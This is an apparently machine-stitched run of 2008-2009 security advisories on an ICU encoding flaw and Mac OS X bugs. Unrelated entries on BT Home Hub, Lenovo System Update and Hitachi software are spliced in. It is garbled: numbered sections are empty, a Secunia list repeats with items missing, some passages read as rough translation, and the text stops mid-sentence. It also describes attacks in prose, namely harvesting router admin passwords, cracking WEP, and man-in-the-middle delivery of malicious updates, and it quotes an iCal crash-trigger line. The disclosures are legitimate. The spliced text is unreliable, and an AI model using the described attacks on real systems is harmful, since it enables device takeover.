The International Components for Unicode (ICU) library in Apple Mac OS X before 10.5.3, Red Hat Enterprise Linux 5, and other operating systems omits some invalid character sequences during conversion of some character encodings, which might allow remote attackers to conduct cross-site scripting (XSS) attacks. The security update addresses a total of 19 new vulnerabilities that affect the AFP Server, AppKit, Apple Pixlet Video, ATS, CFNetwork, CoreFoundation, CoreGraphics, CoreTypes, CUPS, Help Viewer, iCal, International Components for Unicode, Image Capture, ImageIO, Kernel, Mail, Single Sign-On, and Wiki Server components of Mac OS X. The International Components for Unicode (ICU) is prone to a vulnerability related to the handling of certain invalid character sequences. An attacker may leverage this vulnerability to bypass content filters. This may lead to cross-site scripting attacks or the disclosure of sensitive information in some cases. Other attacks are also possible. NOTE: This issue was previously covered in BID 29412 (Apple Mac OS X 2008-003 Multiple Security Vulnerabilities), but has been given its own record to better document the vulnerability. I. Further details are available in the US-CERT Vulnerability Notes Database. II. III. These and other updates are available via Software Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA08-150A Feedback VU#566875" in the subject. _________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. _________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History May 29 2008: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBSD8M8XIHljM+H4irAQL8gggAhPXOm6pPXxrZpjiJYHmlhwCCIclyj9vo Yvs/cicI8vJ3vB4xkUd51/iFoze6D3mFnSxwVAgrixysdkaCxBUyWqmRumEDTXfx 403FR2yIFpSFr7+9VXXWpmq6E0aHVjrKPOArq5uysuIPOHiEbKUisT2gBXUlPrtN RjUg/w/9/IEryPxv/nVzHMcLDde2OLyoo+tiSCOqJK/sC/VUM/d1zkdIDOfu0zom vmqM10hDyA7VR2rgkKvSbqXOWHua0t4eHaNMP0h3N51yLmFhMHxBGj9zWXj9dpHI DcQ9gnQKm7YocOfLC4IPV0BWuPoAkNOEAPeRapPgmJ60icjOpn/MTQ== =QvSr -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. 1) An error in AFP server allows connected users or guests to access files and directories that are not within a shared directory. 2) Some vulnerabilities in Apache can be exploited by malicious people to conduct cross-site scripting attacks or to cause a DoS (Denial of Service). 3) An unspecified error in AppKit can potentially be exploited to execute arbitrary code when a user opens a specially crafted document file with an editor that uses AppKit (e.g. TextEdit). 4) Multiple unspecified errors exist in the processing of Pixlet video files. These can be exploited to cause memory corruption and potentially allow for execution of arbitrary code when a user opens a specially crafted movie file. 5) An unspecified error exists in Apple Type Services when processing embedded fonts in PDF files. This can be exploited to cause a memory corruption when a PDF file containing a specially crafted embedded font is printed. Successful exploitation may allow execution of arbitrary code. 6) An error in Safari's SSL client certificate handling can lead to an information disclosure of the first client certificate found in the keychain when a web server issues a client certificate request. 7) An integer overflow exists in CoreFoundation when handling CFData objects. This can be exploited to cause a heap-based buffer overflow if an application calls "CFDataReplaceBytes" with an invalid "length" argument. 8) An error due to an uninitialised variable in CoreGraphics can potentially be exploited to execute arbitrary code when a specially crafted PDF is opened. 9) A weakness is caused due to users not being warned before opening certain potentially unsafe content types. 11) Some vulnerabilities in Adobe Flash Player can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, or to potentially compromise a user's system. For more information: SA28083 12) An integer underflow error in Help Viewer when handling help:topic URLs can be exploited to cause a buffer overflow when a specially crafted help:topic URL is accessed. Successful exploitation may allow execution of arbitrary code. 14) Input passed to unspecified parameters in Image Capture's embedded web server is not properly sanitised before being used. This can be exploited to disclose the content of local files via directory traversal attacks. 15) An error in the handling of temporary files in Image Capture can be exploited by malicious, local users to manipulate files with the privilege of a user running Image Capture. 16) A boundary error in the BMP and GIF image decoding engine in ImageIO can be exploited to disclose content in memory. 17) Some vulnerabilities in ImageIO can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerabilities are caused due to the use of vulnerable libpng code. For more information: SA27093 SA27130 18) An integer overflow error in ImageIO within the processing of JPEG2000 images can be exploited to cause a heap-based buffer overflow when a specially crafted JPEG2000 image is viewed. Successful exploitation of this vulnerability may allow execution of arbitrary code. 19) An error in Mail is caused due to an uninitialised variable and can lead to disclosure of sensitive information and potentially execution of arbitrary code when mail is sent through an SMTP server over IPv6. For more information: SA28323 21) The sso_util command-line tool requires that passwords be passed to it in its arguments, which can be exploited by malicious, local users to disclose the passwords. 22) An error in Wiki Server can be exploited to determine valid local user names when nonexistent blogs are accessed. ORIGINAL ADVISORY: http://support.apple.com/kb/HT1897 OTHER REFERENCES: SA18008: http://secunia.com/advisories/18008/ SA18307: http://secunia.com/advisories/18307/ SA26273: http://secunia.com/advisories/26273/ SA26636: http://secunia.com/advisories/26636/ SA27093: http://secunia.com/advisories/27093/ SA27130: http://secunia.com/advisories/27130/ SA28081: http://secunia.com/advisories/28081/ SA28083: http://secunia.com/advisories/28083/ SA28323: http://secunia.com/advisories/28323/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . =========================================================== Ubuntu Security Notice USN-747-1 March 26, 2009 icu vulnerability CVE-2008-1036 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libicu34 3.4.1a-1ubuntu1.6.06.2 Ubuntu 7.10: libicu36 3.6-3ubuntu0.2 Ubuntu 8.04 LTS: libicu38 3.8-6ubuntu0.1 Ubuntu 8.10: libicu38 3.8.1-2ubuntu0.1 After a standard system upgrade you need to restart applications linked against libicu, such as OpenOffice.org, to effect the necessary changes. Details follow: It was discovered that libicu did not correctly handle certain invalid encoded data. If a user or automated system were tricked into processing specially crafted data with applications linked against libicu, certain content filters could be bypassed. ---------------------------------------------------------------------- Did you know? Our assessment and impact rating along with detailed information such as exploit code availability, or if an updated patch is released by the vendor, is not part of this mailing-list? Click here to learn more about our commercial solutions: http://secunia.com/advisories/business_solutions/ Click here to trial our solutions: http://secunia.com/advisories/try_vi/ ---------------------------------------------------------------------- TITLE: Red Hat update for icu SECUNIA ADVISORY ID: SA34290 VERIFY ADVISORY: http://secunia.com/advisories/34290/ DESCRIPTION: Red Hat has issued an update for icu. For more information: SA34246 SOLUTION: Updated packages are available via Red Hat Network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1762-1 security@debian.org http://www.debian.org/security/ Steffen Joeris April 02, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : icu Vulnerability : insufficient input sanitising Problem type : remote Debian-specific: no CVE Id : CVE-2008-1036 It was discovered that icu, the internal components for Unicode, did not properly sanitise invalid encoded data, which could lead to cross- site scripting attacks. For the stable distribution (lenny), this problem has been fixed in version 3.8.1-3+lenny1. For the oldstable distribution (etch), this problem has been fixed in version 3.6-2etch2. For the testing distribution (squeeze) and the unstable distribution (sid), this problem has been fixed in version 4.0.1-1. We recommend that you upgrade your icu packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/i/icu/icu_3.6-2etch2.diff.gz Size/MD5 checksum: 14912 d15e89ba186f4003cf0fe25523bf5b68 http://security.debian.org/pool/updates/main/i/icu/icu_3.6-2etch2.dsc Size/MD5 checksum: 600 be64e9d5a346866e9cb5c0f60243d2fe http://security.debian.org/pool/updates/main/i/icu/icu_3.6.orig.tar.gz Size/MD5 checksum: 9778863 0f1bda1992b4adca62da68a7ad79d830 Architecture independent packages: http://security.debian.org/pool/updates/main/i/icu/icu-doc_3.6-2etch2_all.deb Size/MD5 checksum: 3334030 c6e6fbd348c8d802746a890393a767a5 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_alpha.deb Size/MD5 checksum: 5584350 c988d1810f2abe6aca3c530061343674 http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_alpha.deb Size/MD5 checksum: 7009562 489c1341f1331b8664ec201d7b0896ac amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_amd64.deb Size/MD5 checksum: 5444828 4cf4fecae90466c879a1b506da4b54da http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_amd64.deb Size/MD5 checksum: 6584058 b74be6476a73b13f397c742dd05a46ef arm architecture (ARM) http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_arm.deb Size/MD5 checksum: 5455872 ffd9a4362bd56c95ac8c9e2d59b0f85b http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_arm.deb Size/MD5 checksum: 6625136 a64d8a5965f960b7a42f175465552d1b i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_i386.deb Size/MD5 checksum: 6480730 bab51b594e5b159ec97c4d0a78e137d4 http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_i386.deb Size/MD5 checksum: 5464844 6022ce1a314dc2ac9ba6a4e7c2364c0f ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_ia64.deb Size/MD5 checksum: 7240032 54c98bff14b4d4b9106cbe4a0f37a790 http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_ia64.deb Size/MD5 checksum: 5865936 dfe2b9a21d02b3f6d0328076e90884b9 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_mips.deb Size/MD5 checksum: 5747772 6f7e94aa52df7e55632aded82da5be5b http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_mips.deb Size/MD5 checksum: 7032276 c873f62a11e599880d349171be6724b7 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_mipsel.deb Size/MD5 checksum: 6767430 c34cfe617b2fa3b0ac265f445a77b151 http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_mipsel.deb Size/MD5 checksum: 5462642 42cec53922ec7b565c314daca3480331 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_powerpc.deb Size/MD5 checksum: 6889534 dbbcea68da2b4cde02734cf8af6a8bdd http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_powerpc.deb Size/MD5 checksum: 5748424 4af92234d22b585cdce7912733bc309e s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_s390.deb Size/MD5 checksum: 6895200 637a01ea921657380bd42959e4bd5adf http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_s390.deb Size/MD5 checksum: 5777440 b1be81050b86652f9c1d943bc4887dc7 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_sparc.deb Size/MD5 checksum: 6772296 b0bb6f8d327193d0e9055e8eb8f98a51 http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_sparc.deb Size/MD5 checksum: 5671528 fa33dfa1c2278405708d23cd94be6919 Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/i/icu/icu_3.8.1-3+lenny1.dsc Size/MD5 checksum: 1297 daaf6d8629a5cde19dcfed98bc9a84a9 http://security.debian.org/pool/updates/main/i/icu/icu_3.8.1.orig.tar.gz Size/MD5 checksum: 10591204 ca52a1eb5050478f5f7d24e16ce01f57 http://security.debian.org/pool/updates/main/i/icu/icu_3.8.1-3+lenny1.diff.gz Size/MD5 checksum: 20267 9c9d1d71c50f4deec44e95a9d5ea2530 Architecture independent packages: http://security.debian.org/pool/updates/main/i/icu/icu-doc_3.8.1-3+lenny1_all.deb Size/MD5 checksum: 3774790 1a1cd3c7fde641350322461af9f57a37 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_alpha.deb Size/MD5 checksum: 7565948 02e495e8771842e904cf67a80de61b82 http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_alpha.deb Size/MD5 checksum: 6065532 de58265aad775defadbb2a7b6af9d88d http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_alpha.deb Size/MD5 checksum: 2364976 a28a051462a4b40c1ca94b663145ce16 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/i/icu/lib32icu-dev_3.8.1-3+lenny1_amd64.deb Size/MD5 checksum: 6062920 3a90fc0d97f43436e4cca417a662b0f8 http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_amd64.deb Size/MD5 checksum: 7131010 c7bcc67bf7ebc77254f2b5b9f312f1bb http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_amd64.deb Size/MD5 checksum: 2401370 d54929d018b9c28224299bad4b3fd3a7 http://security.debian.org/pool/updates/main/i/icu/lib32icu38_3.8.1-3+lenny1_amd64.deb Size/MD5 checksum: 5920040 bfbb1dd39f462c2737a114f40fc3b494 http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_amd64.deb Size/MD5 checksum: 5932356 bcf6d7dab8a71f00e702384b97cf19a4 arm architecture (ARM) http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_arm.deb Size/MD5 checksum: 2286786 ce4bb8567f48cc3cf235368db8963544 http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_arm.deb Size/MD5 checksum: 7183924 fbc8204644ef5e0fc74fc22f7d26034a http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_arm.deb Size/MD5 checksum: 5907872 93989d0a25c86c9e38e6317ca420fbc4 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_armel.deb Size/MD5 checksum: 1755700 89f87c26a0ce9a7f923a05d9b2555673 http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_armel.deb Size/MD5 checksum: 7411842 70fc597eeb9c0e9e68d0137e0216f124 http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_armel.deb Size/MD5 checksum: 5847710 08c26011ddb182edb57549e671d6cc61 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_hppa.deb Size/MD5 checksum: 6377564 b8b8b1a62a0a02dd8469f7c172d92415 http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_hppa.deb Size/MD5 checksum: 7663982 cae24c749162aa3f4a896ec5dbde678a http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_hppa.deb Size/MD5 checksum: 2357154 3ba097e27ead38178bbb8f804f13d77a i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_i386.deb Size/MD5 checksum: 2278828 f9111677c4e7b9244bd643d748e2f18c http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_i386.deb Size/MD5 checksum: 5920016 7aecb5bc8fe15f0c1b5ef5c4419eab6a http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_i386.deb Size/MD5 checksum: 6991888 351e9f8d60f139c335bf7ea07235dc08 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_ia64.deb Size/MD5 checksum: 6396240 7c56b1d5f54c9f6a4a2a6fc9698e4337 http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_ia64.deb Size/MD5 checksum: 7825392 c99733de07fe43de5c0c1d923ebf93aa http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_ia64.deb Size/MD5 checksum: 2207992 757e5e5c49c66411cc7e1077808c7576 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_mips.deb Size/MD5 checksum: 7599142 1d81608602f7b3a18dc8e3d03bf603ff http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_mips.deb Size/MD5 checksum: 6207630 d7bd482f6030f1ae4ff75c4735947b08 http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_mips.deb Size/MD5 checksum: 2472538 2f7b6f0c8a5dfa6ce877b8305a6779b0 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_mipsel.deb Size/MD5 checksum: 2405182 59d89f0a9a81429ec02f87debcb8e6a3 http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_mipsel.deb Size/MD5 checksum: 5898892 94257031e244b5b52e9cbe8e37bb1f30 http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_mipsel.deb Size/MD5 checksum: 7293408 f70b0c75989a5983f6921ee323b99c3c powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_powerpc.deb Size/MD5 checksum: 6290800 bae34e705b5213d14a638350398a7d29 http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_powerpc.deb Size/MD5 checksum: 7460598 8edd0cb02d62dfc5ce69c872e413ca39 http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_powerpc.deb Size/MD5 checksum: 2376240 00fc0ad10f85fded7380fcaaccbe1514 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_s390.deb Size/MD5 checksum: 7434356 de117fb929327d908c11ede36daa9166 http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_s390.deb Size/MD5 checksum: 6269494 a17ae098f688e8a14bc79854013cada4 http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_s390.deb Size/MD5 checksum: 2468406 d57fdf831571e1147f213051a50f8fdd sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_sparc.deb Size/MD5 checksum: 6144646 e12966bb72793d7e6220eafd5ddb0c88 http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_sparc.deb Size/MD5 checksum: 2133070 454335db0966dc15c78261ef1a8fdcfc http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_sparc.deb Size/MD5 checksum: 7302732 432d9fdee1502bf363d1db33ee6519ab These files will probably be moved into the stable distribution on its next update

BT Home Hub is a wireless Internet router for home use. The latest firmware version of BT Home Hub adds a new security feature that allows the default administrator password to be changed from admin to the serial number of the router, but as long as the MDAP multicast request is sent to the network where the router is located, the Home Hub sequence can be obtained. number. To exploit this vulnerability, an attacker must join the LAN where the Home Hub is located via ethernet or Wi-Fi. There are two ways to hack into the BT Home Hub Wi-Fi network: - arp playback injection and weak IV cracking - guess the Home Hub's default WEP key list by SSID violence. Exploiting this issue can allow an unauthenticated remote attacker to harvest the administrator password of the device. This can facilitate the complete compromise of the device and may aid in launching further attacks on computers routed through the device. This issue affects Home Hub firmware 6.2.6.E

The client in Lenovo System Update before 3.14 does not properly validate the certificate when establishing an SSL connection, which allows remote attackers to install arbitrary packages via an SSL certificate whose X.509 headers match a public certificate used by IBM. Lenovo System Update is prone to a security-bypass vulnerability because the application fails to properly check SSL certificates. Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks by impersonating trusted servers, which can lead to the installation of arbitrary software on an affected computer. This may result in a complete compromise of the computer. This issue affects Lenovo System Update 3 (Version 3.13.0005, Build date 2008-1-3); other versions may also be vulnerable. Lenovo System Update is a set of system automatic update tools from Lenovo in China, which includes device driver updates, Windows system patch updates, etc. Lenovo's System Update service allows downloading and installing arbitrary update executables from fake servers. After the SSL negotiation is successful, the client will continue to download the XML file, which contains the path name, size and related SHA-1 hash to the EXE file. If the software version displayed in the XML file is higher than the version of the installed software, the EXE file will be downloaded, the SHA-1 hash will be calculated and compared with the hash defined in the XML file, and if it matches, it will be administrator Permission to execute executable programs. To exploit this vulnerability, the attacker must create a self-signed SSL certificate that contains the X.509 header values ​​(issuer, common name, organization, etc.) of the public SSL certificate used by the SystemUpdate server (download.boulder.ibm.com) , the attacker would also modify the XML configuration file of the targeted software package so that the version number, file size, and SHA-1 hash match the malicious EXE file. When SystemUpdate tries to connect to the server, the attacker can accept the connection through techniques such as DNS spoofing and ARP redirection. Wireless networks are especially at risk because impersonation of access points can simplify attacks. Once SystemUpdate connects to TCP port 443, the fake server negotiates an SSL session with an attacker-created SSL certificate, then sends malicious XML and EXE files when SystemUpdate requests the targeted software package. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. Learn more: http://secunia.com/network_software_inspector_2/ ---------------------------------------------------------------------- TITLE: ThinkVantage System Update Missing SSL Certificate Chain Verification SECUNIA ADVISORY ID: SA30379 VERIFY ADVISORY: http://secunia.com/advisories/30379/ CRITICAL: Less critical IMPACT: Spoofing WHERE: >From remote SOFTWARE: ThinkVantage System Update 3.x http://secunia.com/product/15450/ DESCRIPTION: Derek Callaway has reported a security issue in ThinkVantage System Update, which can be exploited by malicious people to conduct spoofing attacks. Successful exploitation allows e.g. downloading and executing malicious programs, but requires that the application connects to a malicious update server providing a specially crafted X.509 certificate (e.g. via DNS poisoning). Other versions may also be affected. http://www-307.ibm.com/pc/support/site.wss/document.do?sitestyle=lenovo&lndocid=MIGR-66956 PROVIDED AND/OR DISCOVERED BY: Derek Callaway, Security Objectives ORIGINAL ADVISORY: SECOBJADV-2008-01: http://www.security-objectives.com/advisories/SECOBJADV-2008-01.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Hitachi JP1/Cm2/Network Node Manager is prone to multiple unspecified remote vulnerabilities. An attacker can exploit these issues to execute arbitrary code within the context of the affected application or crash the application, denying service to legitimate users.

Use-after-free vulnerability in Apple iCal 3.0.1 on Mac OS X allows remote CalDAV servers, and user-assisted remote attackers, to trigger memory corruption or possibly execute arbitrary code via an "ATTACH;VALUE=URI:S=osumi" line in a .ics file, which triggers a "resource liberation" bug. NOTE: CVE-2008-2007 was originally used for this issue, but this is the appropriate identifier. The security update addresses a total of 19 new vulnerabilities that affect the AFP Server, AppKit, Apple Pixlet Video, ATS, CFNetwork, CoreFoundation, CoreGraphics, CoreTypes, CUPS, Help Viewer, iCal, International Components for Unicode, Image Capture, ImageIO, Kernel, Mail, Single Sign-On, and Wiki Server components of Mac OS X. Attackers can leverage this issue to execute arbitrary code with the privileges of the affected application. Successful exploits will compromise the application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions. NOTE: This issue was previously covered in BID 29412 (Apple Mac OS X 2008-003 Multiple Security Vulnerabilities) but has been given its own record to better document the vulnerability. I. Further details are available in the US-CERT Vulnerability Notes Database. II. III. IV. Please send email to <cert@cert.org> with "TA08-150A Feedback VU#566875" in the subject. _________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. _________________________________________________________________ Produced 2008 by US-CERT, a government organization. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. 1) An error in AFP server allows connected users or guests to access files and directories that are not within a shared directory. 2) Some vulnerabilities in Apache can be exploited by malicious people to conduct cross-site scripting attacks or to cause a DoS (Denial of Service). 3) An unspecified error in AppKit can potentially be exploited to execute arbitrary code when a user opens a specially crafted document file with an editor that uses AppKit (e.g. TextEdit). 4) Multiple unspecified errors exist in the processing of Pixlet video files. 5) An unspecified error exists in Apple Type Services when processing embedded fonts in PDF files. This can be exploited to cause a memory corruption when a PDF file containing a specially crafted embedded font is printed. Successful exploitation may allow execution of arbitrary code. 6) An error in Safari's SSL client certificate handling can lead to an information disclosure of the first client certificate found in the keychain when a web server issues a client certificate request. 7) An integer overflow exists in CoreFoundation when handling CFData objects. This can be exploited to cause a heap-based buffer overflow if an application calls "CFDataReplaceBytes" with an invalid "length" argument. 8) An error due to an uninitialised variable in CoreGraphics can potentially be exploited to execute arbitrary code when a specially crafted PDF is opened. 9) A weakness is caused due to users not being warned before opening certain potentially unsafe content types. 10) An error when printing to password-protected printers with debug logging enabled may lead to the disclosure of sensitive information. 11) Some vulnerabilities in Adobe Flash Player can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, or to potentially compromise a user's system. For more information: SA28083 12) An integer underflow error in Help Viewer when handling help:topic URLs can be exploited to cause a buffer overflow when a specially crafted help:topic URL is accessed. Successful exploitation may allow execution of arbitrary code. 13) A conversion error exists in ICU when handling certain character encodings. This can potentially be exploited bypass content filters and may lead to cross-site scripting and disclosure of sensitive information. 14) Input passed to unspecified parameters in Image Capture's embedded web server is not properly sanitised before being used. This can be exploited to disclose the content of local files via directory traversal attacks. 15) An error in the handling of temporary files in Image Capture can be exploited by malicious, local users to manipulate files with the privilege of a user running Image Capture. 16) A boundary error in the BMP and GIF image decoding engine in ImageIO can be exploited to disclose content in memory. 17) Some vulnerabilities in ImageIO can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerabilities are caused due to the use of vulnerable libpng code. For more information: SA27093 SA27130 18) An integer overflow error in ImageIO within the processing of JPEG2000 images can be exploited to cause a heap-based buffer overflow when a specially crafted JPEG2000 image is viewed. Successful exploitation of this vulnerability may allow execution of arbitrary code. 19) An error in Mail is caused due to an uninitialised variable and can lead to disclosure of sensitive information and potentially execution of arbitrary code when mail is sent through an SMTP server over IPv6. 20) A vulnerability in Mongrel can be exploited by malicious people to disclose sensitive information. For more information: SA28323 21) The sso_util command-line tool requires that passwords be passed to it in its arguments, which can be exploited by malicious, local users to disclose the passwords. 22) An error in Wiki Server can be exploited to determine valid local user names when nonexistent blogs are accessed. ORIGINAL ADVISORY: http://support.apple.com/kb/HT1897 OTHER REFERENCES: SA18008: http://secunia.com/advisories/18008/ SA18307: http://secunia.com/advisories/18307/ SA26273: http://secunia.com/advisories/26273/ SA26636: http://secunia.com/advisories/26636/ SA27093: http://secunia.com/advisories/27093/ SA27130: http://secunia.com/advisories/27130/ SA28081: http://secunia.com/advisories/28081/ SA28083: http://secunia.com/advisories/28083/ SA28323: http://secunia.com/advisories/28323/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Multiple vulnerabilities in iCal *Advisory Information* Title: Multiple vulnerabilities in iCal Advisory ID: CORE-2008-0126 Advisory URL: http://www.coresecurity.com/?action=item&id=2219 Date published: 2008-05-21 Date of last update: 2008-05-21 Vendors contacted: Apple Inc. Release mode: Coordinated release *Vulnerability Information* Class: Input Validation Remotely Exploitable: Yes (client-side) Locally Exploitable: No Bugtraq ID: 28629 28632 28633 CVE Name: CVE-2008-1035 CVE-2008-2006 CVE-2008-2007 *Vulnerability Description* iCal is a personal calendar application from Apple Inc. The calendar application can be used as a stand-alone application or as a client-side component to calendar server that lets users create and share multiple calendars and subscribe to other user's calendars. Apple's iCal uses the iCalendar standard for its calendar file format (which uses the '.ics' filename extension) [1] and the CalDAV protocol for calendar sharing [2]. There is a growing number of web sites providing calendars files and open subscription to calendar updates [3][4][5]. The other two 